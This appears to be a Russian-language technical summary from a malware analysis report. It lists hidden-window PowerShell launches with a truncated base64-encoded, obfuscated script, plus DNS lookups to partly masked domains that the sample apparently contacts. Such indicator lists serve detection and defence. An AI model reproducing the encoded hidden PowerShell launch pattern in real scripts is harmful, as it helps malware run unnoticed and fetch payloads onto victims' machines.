Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAGMAagB4AHQAaABwAG4AbQBpAHkAdgA9ACcAVwBmAHgAbABwAGkAeQBhAGoAJwA7ACQASgB3AHMAbQB6AGQAagBwAGkAZQAgAD...
- DNS ASK wo######romthenations.com
- DNS ASK ay###ehit.com
- DNS ASK de###.webmartit.com
- DNS ASK fa####ntattoo.xyz
- DNS ASK ta###dmac.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAGMAagB4AHQAaABwAG4AbQBpAHkAdgA9ACcAVwBmAHgAbABwAGkAeQBhAGoAJwA7ACQASgB3AHMAbQB6AGQAagBwAGkAZQAgAD...' (со скрытым окном)